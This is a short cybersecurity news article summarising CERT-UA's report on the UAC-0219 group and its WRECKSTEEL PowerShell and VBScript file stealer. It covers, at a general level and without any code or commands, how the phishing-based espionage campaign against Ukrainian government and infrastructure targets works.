UAC-0219 Hackers Leverage WRECKSTEEL PowerShell Stealer to Extract Data from Computers

In a concerning development, CERT-UA, Ukraine’s Computer Emergency Response Team, has reported a series of cyberattacks attributed to the hacker group identified as UAC-0219.

These attacks, which have been ongoing since the fall of 2024, utilize an advanced PowerShell-based malware tool named WRECKSTEEL to infiltrate computers and extract sensitive data.

The primary targets include government agencies and critical infrastructure facilities across Ukraine.

Sophisticated Attack Methodology

The cyber espionage campaign employs a multi-stage attack mechanism.

Initially, compromised accounts are used to distribute phishing emails containing links to public file-sharing services such as DropMeFiles and Google Drive.

These links often appear in PDF attachments and lead victims to download VBScript loaders disguised as “.js” files.

Once executed, these scripts deploy a PowerShell payload designed to search for specific file types such as “.doc”, “.pdf”, “.xlsx”, and “.jpeg” and upload them using cURL commands.

Additionally, the malware captures screenshots of infected computers to further enhance data collection capabilities.

CERT-UA’s analysis reveals that earlier versions of this malware relied on EXE files created with the NSIS installer, which included decoy documents and tools like the IrfanView graphics editor for screenshot capture.

However, since 2025, the screenshot functionality has been fully integrated into the PowerShell script itself, demonstrating an evolution in the attackers’ tactics.

WRECKSTEEL: A Versatile Data-Stealing Tool

The WRECKSTEEL malware is central to these operations and exists in both VBScript and PowerShell variants.

Its primary function is to systematically steal files from compromised systems.

The malware’s design reflects a high level of sophistication, allowing it to evade detection while efficiently gathering targeted data.

CERT-UA has tracked this activity under the identifier UAC-0219 and warns that similar tools may be deployed in future attacks against other critical sectors.

The ongoing cyberattacks highlight the persistent threat posed by UAC-0219 and similar groups.

CERT-UA emphasizes the importance of vigilance among organizations handling sensitive information.

Indicators of compromise (IoCs), including malicious scripts and network addresses associated with these attacks, have been shared publicly to aid in detection efforts.

Organizations are urged to report any signs of compromise immediately to CERT-UA for rapid response and mitigation measures.

As Ukraine continues to face cyber threats targeting its critical infrastructure, CERT-UA remains committed to analyzing incidents and providing timely updates on emerging risks.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!